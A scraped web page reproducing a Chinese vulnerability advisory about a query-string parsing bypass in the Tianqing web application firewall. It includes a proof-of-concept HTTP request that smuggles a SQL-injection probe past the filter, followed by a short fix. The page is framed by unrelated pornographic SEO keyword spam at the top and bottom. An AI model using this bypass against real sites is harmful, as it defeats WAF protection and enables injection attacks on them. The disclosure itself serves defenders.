六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

啟明星辰天清Web應用安全網關協議解析繞過漏洞

[摘要]啟明星辰天清Web應用安全網關中存在協議解析繞過漏洞,該漏洞源于對http協議兼容未正確處理。攻擊者可利用該漏洞繞過WAF對于querystring的所有過濾,從而攻擊受保護的網站。 Servlet/2.5等jsp處理容器,能夠正確處理http協議GET /news.jsp?x= &...



    啟明星辰天清Web應用安全網關中存在協議解析繞過漏洞,該漏洞源于對http協議兼容未正確處理。攻擊者可利用該漏洞繞過WAF對于querystring的所有過濾,從而攻擊受保護的網站。
    Servlet/2.5等jsp處理容器,能夠正確處理http協議GET /news.jsp?x= &id=16 HTTP/1.1中參數&id=16前面的空格獲取id=16這個參數,例如下數據包返回網頁正常:


    GET /news.jsp?x= &id=16 HTTP/1.1

    Accept: text/html, application/xhtml+xml, */*

    Accept-Language: zh-CN

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

    Connection: close

    Host: www.test.com

    Pragma: no-cache





    與http://www.test.com/news.jsp?id=16返回網頁相同。





    而啟明星辰天清Web應用安全網關解析協議時,會忽略GET /news.jsp?x= &id=16%20and%201=1 HTTP/1.1中"?x=空格"之后的參數,從而繞過防護。

    例直接訪問:http://www.test.com/news.jsp?x=%20&id=16%20and%201=1會攔截

    構造如下poc繞過:

    GET /news.jsp?x= &id=16%20and%201=1 HTTP/1.1

    Accept: text/html, application/xhtml+xml, */*

    Accept-Language: zh-CN

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

    Connection: close

    Host: www.test.com

    Pragma: no-cache

    修復方案:

    正確解析http請求第一行中 url參數帶空格字符后的參數
 


上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。




主站蜘蛛池模板: 日韩a免费| 日本免费完整版观看 | 亚洲第一成人在线 | 视频二区 素人 欧美 日韩 | 亚洲精品福利你懂 | 日本一区二区影院 | 天堂在线视频 | 日本五级床片在线观看 | 日韩午夜伦 | 清清草免费视频 | 午夜老司机在线观看 | 日韩精品影院 | 日韩免费毛片全部不收费 | 亚洲性视频在线 | 天天影视色香欲综合网天天录日日录 | 中文字幕波多野不卡一区 | 欧美亚洲一区 | 欧美一级视频在线观看欧美 | 午夜视频在线观看免费视频 | 亚洲天堂一区二区 | 欧美做真爱免费无遮挡 | 亚洲 欧美 91 | 天天干天天操天天插 | 午夜亚洲一区二区福利 | 色色就色色| 日皮毛片 | 综合久久综合久久 | 天天射天天摸 | 夜夜伊人 | 日韩视频中文字幕专区 | 欧美视频亚洲视频 | 手机在线播放av | 午夜丁香婷婷 | 一级毛片a女人刺激视频免费 | 欧美在线综合视频 | 中文字幕不卡免费高清视频 | 欧美一级特黄特色大片 | 色尼玛图| 色五月激情五月 | 欧美特黄一级高清免费的香蕉 | 青青在线观看视频 |